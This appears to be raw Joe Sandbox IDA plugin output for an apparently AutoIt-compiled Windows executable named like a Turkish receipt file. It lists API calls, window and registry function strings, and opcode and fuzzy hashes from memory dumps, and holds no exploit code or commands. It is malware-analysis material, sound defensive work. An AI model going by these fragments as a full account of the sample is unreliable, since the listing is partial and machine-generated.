                                                        • SetTextColor.GDI32(?,?), ref: 00EAD5B2
                                                        • GetSysColorBrush.USER32(0000000F), ref: 00EAD5C8
                                                        • GetSysColor.USER32(0000000F), ref: 00EAD5D3
                                                        • CreateSolidBrush.GDI32(?), ref: 00EAD5D8
                                                        • GetSysColor.USER32(00000011), ref: 00EAD5F0
                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00EAD5FE
                                                        • SelectObject.GDI32(?,00000000), ref: 00EAD60F
                                                        • SetBkColor.GDI32(?,00000000), ref: 00EAD618
                                                        • SelectObject.GDI32(?,?), ref: 00EAD625
                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00EAD644
                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00EAD65B
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00EAD670
                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00EAD698
                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00EAD6BF
                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 00EAD6DD
                                                        • DrawFocusRect.USER32(?,?), ref: 00EAD6E8
                                                        • GetSysColor.USER32(00000011), ref: 00EAD6F6
                                                        • SetTextColor.GDI32(?,00000000), ref: 00EAD6FE
                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00EAD712
                                                        • SelectObject.GDI32(?,00EAD2A5), ref: 00EAD729
                                                        • DeleteObject.GDI32(?), ref: 00EAD734
                                                        • SelectObject.GDI32(?,?), ref: 00EAD73A
                                                        • DeleteObject.GDI32(?), ref: 00EAD73F
                                                        • SetTextColor.GDI32(?,?), ref: 00EAD745
                                                        • SetBkColor.GDI32(?,?), ref: 00EAD74F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                        • String ID:
                                                        • API String ID: 1996641542-0
                                                        • Opcode ID: b8c5949b0f45d67df49c452dc52f368629b582c17717062f2f8bf8fbf7e65d7c
                                                        • Instruction ID: e915f51186f6f75d4128e0040cc33ab631ea28972bf238f071223667d2c6810a
                                                        • Opcode Fuzzy Hash: b8c5949b0f45d67df49c452dc52f368629b582c17717062f2f8bf8fbf7e65d7c
                                                        • Instruction Fuzzy Hash: E3516D71905208EFDB109FA5DC48EAEBBB9FF09324F104125F916BB2A0D772AA05CF50
                                                        APIs
                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00EAB7B0
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EAB7C1
                                                        • CharNextW.USER32(0000014E), ref: 00EAB7F0
                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00EAB831
                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00EAB847
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EAB858
                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00EAB875
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00EAB8C7
                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00EAB8DD
                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EAB90E
                                                        • _memset.LIBCMT ref: 00EAB933
                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00EAB97C
                                                        • _memset.LIBCMT ref: 00EAB9DB
                                                        • SendMessageW.USER32 ref: 00EABA05
                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00EABA5D
                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 00EABB0A
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00EABB2C
                                                        • GetMenuItemInfoW.USER32(?), ref: 00EABB76
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00EABBA3
                                                        • DrawMenuBar.USER32(?), ref: 00EABBB2
                                                        • SetWindowTextW.USER32(?,0000014E), ref: 00EABBDA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                        • String ID: 0
                                                        • API String ID: 1073566785-4108050209
                                                        • Opcode ID: bd62d3a757c153f969cadd3a2ad695acf5b7264e19ebd685b2bf57503f0bfd10
                                                        • Instruction ID: 742e4a3137634fe32e9c180a8ec4a47ab4a5080d0e0effa9cd6280e693102c60
                                                        • Opcode Fuzzy Hash: bd62d3a757c153f969cadd3a2ad695acf5b7264e19ebd685b2bf57503f0bfd10
                                                        • Instruction Fuzzy Hash: 21E1A071900218AFDB109F65CC84EEE7BB8FF0A714F10916AF919BE192D771AA41DF60
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$Foreground
                                                        • String ID: ACTIVE$ALL$CLASS$H+$HANDLE$INSTANCE$L+$LAST$P+$REGEXPCLASS$REGEXPTITLE$T+$TITLE
                                                        • API String ID: 62970417-993842312
                                                        • Opcode ID: a4967b1a0ab2a71c1dc9e2155f0e67034aa267b585827ca08b3253435cf10942
                                                        • Instruction ID: d44bd1a990f0ccf66e808a8762c76781cab93e9971c29b56a4d7a47594f259ba
                                                        • Opcode Fuzzy Hash: a4967b1a0ab2a71c1dc9e2155f0e67034aa267b585827ca08b3253435cf10942
                                                        • Instruction Fuzzy Hash: E1D1C6305082469BCB04EF20D8819EBFBF0BF94344F506A1DF655B76A1DB30E95ACB92
                                                        APIs
                                                        • GetCursorPos.USER32(?), ref: 00EA778A
                                                        • GetDesktopWindow.USER32 ref: 00EA779F
                                                        • GetWindowRect.USER32(00000000), ref: 00EA77A6
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00EA7808
                                                        • DestroyWindow.USER32(?), ref: 00EA7834
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00EA785D
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EA787B
                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00EA78A1
                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00EA78B6
                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00EA78C9
                                                        • IsWindowVisible.USER32(?), ref: 00EA78E9
                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00EA7904
                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00EA7918
                                                        • GetWindowRect.USER32(?,?), ref: 00EA7930
                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 00EA7956
                                                        • GetMonitorInfoW.USER32 ref: 00EA7970
                                                        • CopyRect.USER32(?,?), ref: 00EA7987
                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 00EA79F2
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                        • String ID: ($0$tooltips_class32
                                                        • API String ID: 698492251-4156429822
                                                        • Opcode ID: 0df1145991d5c8eee3b0a2105814399f4cd251f720908efee07bfc88acc7b081
                                                        • Instruction ID: b5ea31b0a6eb090c8e40a42e1bb0fb2b0777d20acbc4102a382d6d10caf73fd6
                                                        • Opcode Fuzzy Hash: 0df1145991d5c8eee3b0a2105814399f4cd251f720908efee07bfc88acc7b081
                                                        • Instruction Fuzzy Hash: A8B18A71608300AFDB04DF65CC48B6ABBE4FF89314F00992DF599AB291DB71E805CB96
                                                        APIs
                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00E86CFB
                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00E86D21
                                                        • _wcscpy.LIBCMT ref: 00E86D4F
                                                        • _wcscmp.LIBCMT ref: 00E86D5A
                                                        • _wcscat.LIBCMT ref: 00E86D70
                                                        • _wcsstr.LIBCMT ref: 00E86D7B
                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00E86D97
                                                        • _wcscat.LIBCMT ref: 00E86DE0
                                                        • _wcscat.LIBCMT ref: 00E86DE7
                                                        • _wcsncpy.LIBCMT ref: 00E86E12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                        • API String ID: 699586101-1459072770
                                                        • Opcode ID: 4c2ae41770936f8702692ab016cd1d6c5c5143d97a6d611786a67ad9caa0db1f
                                                        • Instruction ID: 200dd61e7eeb718709c10d1e961128e3048658e0f07cdbb06333ce9eeec290a8
                                                        • Opcode Fuzzy Hash: 4c2ae41770936f8702692ab016cd1d6c5c5143d97a6d611786a67ad9caa0db1f
                                                        • Instruction Fuzzy Hash: 1941F471A44204BBEB01BB749C43EBFB7BCDF41354F04206AF909B2182EB759A0597A2
                                                        APIs
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E5A939
                                                        • GetSystemMetrics.USER32(00000007), ref: 00E5A941
                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E5A96C
                                                        • GetSystemMetrics.USER32(00000008), ref: 00E5A974
                                                        • GetSystemMetrics.USER32(00000004), ref: 00E5A999
                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E5A9B6
                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00E5A9C6
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E5A9F9
                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E5AA0D
                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00E5AA2B
                                                        • GetStockObject.GDI32(00000011), ref: 00E5AA47
                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E5AA52
                                                          • Part of subcall function 00E5B63C: GetCursorPos.USER32(000000FF), ref: 00E5B64F
                                                          • Part of subcall function 00E5B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00E5B66C
                                                          • Part of subcall function 00E5B63C: GetAsyncKeyState.USER32(00000001), ref: 00E5B691
                                                          • Part of subcall function 00E5B63C: GetAsyncKeyState.USER32(00000002), ref: 00E5B69F
                                                        • SetTimer.USER32(00000000,00000000,00000028,00E5AB87), ref: 00E5AA79
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        • Opcode ID: 06f211e5226698592eb95ee56c8322f6a1b46c2719511ed38d6b548ba0c9aec6
                                                        • Instruction ID: 639448e56693840dad6e5e482eae381f3d59743c85163903e838a9cc10458775
                                                        • Opcode Fuzzy Hash: 06f211e5226698592eb95ee56c8322f6a1b46c2719511ed38d6b548ba0c9aec6
                                                        • Instruction Fuzzy Hash: 7AB1B731A0420AAFDB04DFA8DC49BEE7BB4FB08315F145229FA15B7290DB72E845CB51
                                                        APIs
                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA3735
                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00EDDC00,00000000,?,00000000,?,?), ref: 00EA37A3
                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EA37EB
                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EA3874
                                                        • RegCloseKey.ADVAPI32(?), ref: 00EA3B94
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00EA3BA1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Close$ConnectCreateRegistryValue
                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                        • API String ID: 536824911-966354055
                                                        • Opcode ID: 3bee127aa2de4d24db1d7442df3ea75a18a749e5500cc2f411250e4dcb90529f
                                                        • Instruction ID: 171f34f8b0829b4afd90b9b9a9782ed8bd8b4f826cac1c5622eba761117b95e8
                                                        • Opcode Fuzzy Hash: 3bee127aa2de4d24db1d7442df3ea75a18a749e5500cc2f411250e4dcb90529f
                                                        • Instruction Fuzzy Hash: DC024A756046019FCB14EF24D855E2AB7E5FF89720F04985DF99AAB3A2CB30ED05CB81
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00EA6C56
                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00EA6D16
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                        • API String ID: 3974292440-719923060
                                                        • Opcode ID: 731054b94bd95f7ee1d3e8b6655c648b7559464ea2a12e3b724b055cfcbe5d74
                                                        • Instruction ID: d0f2ea717276a5fb330442b10c8838d2d34cbfa50f65392d3a1c19c4df4a1905
                                                        • Opcode Fuzzy Hash: 731054b94bd95f7ee1d3e8b6655c648b7559464ea2a12e3b724b055cfcbe5d74
                                                        • Instruction Fuzzy Hash: BBA16D342042459FCB14EF20C851A6AB3E5AF8A354F14AD6DB9967B3D2DB70FD0ACB41
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E7CF91
                                                        • __swprintf.LIBCMT ref: 00E7D032
                                                        • _wcscmp.LIBCMT ref: 00E7D045
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00E7D09A
                                                        • _wcscmp.LIBCMT ref: 00E7D0D6
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00E7D10D
                                                        • GetDlgCtrlID.USER32(?), ref: 00E7D15F
                                                        • GetWindowRect.USER32(?,?), ref: 00E7D195
                                                        • GetParent.USER32(?), ref: 00E7D1B3
                                                        • ScreenToClient.USER32(00000000), ref: 00E7D1BA
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00E7D234
                                                        • _wcscmp.LIBCMT ref: 00E7D248
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 00E7D26E
                                                        • _wcscmp.LIBCMT ref: 00E7D282
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                        • String ID: %s%u
                                                        • API String ID: 3119225716-679674701
                                                        • Opcode ID: 09dab9d85e10a9b0389705daa0e6958dd931dacc6077010365490b3ce1dbd11f
                                                        • Instruction ID: e51ae65fe17afcb661042602140625bd55a82708e447000b47409f8c42d2be7d
                                                        • Opcode Fuzzy Hash: 09dab9d85e10a9b0389705daa0e6958dd931dacc6077010365490b3ce1dbd11f
                                                        • Instruction Fuzzy Hash: E5A1BF71208246AFC715DF64CC84FAAB7E8FF44358F009529F99DA21A1EB30E906CB91
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 00E7D8EB
                                                        • _wcscmp.LIBCMT ref: 00E7D8FC
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 00E7D924
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 00E7D941
                                                        • _wcscmp.LIBCMT ref: 00E7D95F
                                                        • _wcsstr.LIBCMT ref: 00E7D970
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00E7D9A8
                                                        • _wcscmp.LIBCMT ref: 00E7D9B8
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 00E7D9DF
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 00E7DA28
                                                        • _wcscmp.LIBCMT ref: 00E7DA38
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 00E7DA60
                                                        • GetWindowRect.USER32(00000004,?), ref: 00E7DAC9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        • Opcode ID: 9454b31b7ded12c14377598cc33c6fbccc116f927b4051f360edeeb11045210a
                                                        • Instruction ID: c13f9e1c55f5cebefb626bc0ff2f4013263365d9043a84c6c1c32d6b7f1d849f
                                                        • Opcode Fuzzy Hash: 9454b31b7ded12c14377598cc33c6fbccc116f927b4051f360edeeb11045210a
                                                        • Instruction Fuzzy Hash: F9819E3100C2059BDB05DF10DC85FAA7BE8FF84358F04A46AED8DAA096DB70D946CBA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        • Opcode ID: b352a3a4ea6524435496fd2ca3fd6b354b7316c95596981fe3143011396978bf
                                                        • Instruction ID: d39cec9f111f73bc5eabfaebfc07a345bdba508ecb1ac5415bc32cea1e4f226f
                                                        • Opcode Fuzzy Hash: b352a3a4ea6524435496fd2ca3fd6b354b7316c95596981fe3143011396978bf
                                                        • Instruction Fuzzy Hash: B4316F32A48309A6DB18EB50ED43EEEB3F49F20754F20616EFA45720D5EB51AE058652
                                                        APIs
                                                        • LoadIconW.USER32(00000063), ref: 00E7EAB0
                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00E7EAC2
                                                        • SetWindowTextW.USER32(?,?), ref: 00E7EAD9
                                                        • GetDlgItem.USER32(?,000003EA), ref: 00E7EAEE
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00E7EAF4
                                                        • GetDlgItem.USER32(?,000003E9), ref: 00E7EB04
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00E7EB0A
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00E7EB2B
                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00E7EB45
                                                        • GetWindowRect.USER32(?,?), ref: 00E7EB4E
                                                        • SetWindowTextW.USER32(?,?), ref: 00E7EBB9
                                                        • GetDesktopWindow.USER32 ref: 00E7EBBF
                                                        • GetWindowRect.USER32(00000000), ref: 00E7EBC6
                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00E7EC12
                                                        • GetClientRect.USER32(?,?), ref: 00E7EC1F
                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00E7EC44
                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00E7EC6F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                        • String ID:
                                                        • API String ID: 3869813825-0
                                                        • Opcode ID: 9d884bd0266e71f42e273c4a224b984c259033ac05197663c47a9b157ec4196a
                                                        • Instruction ID: 1546c5771c937b44869e3de6ebd9312aa578d3abd5eb8b1cc93e5616b17c8e3d
                                                        • Opcode Fuzzy Hash: 9d884bd0266e71f42e273c4a224b984c259033ac05197663c47a9b157ec4196a
                                                        • Instruction Fuzzy Hash: 11513F71900709EFDB20DFA9CD89E6EBBF5FF08708F004568E596B26A0C775A945CB10
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00E979C6
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00E979D1
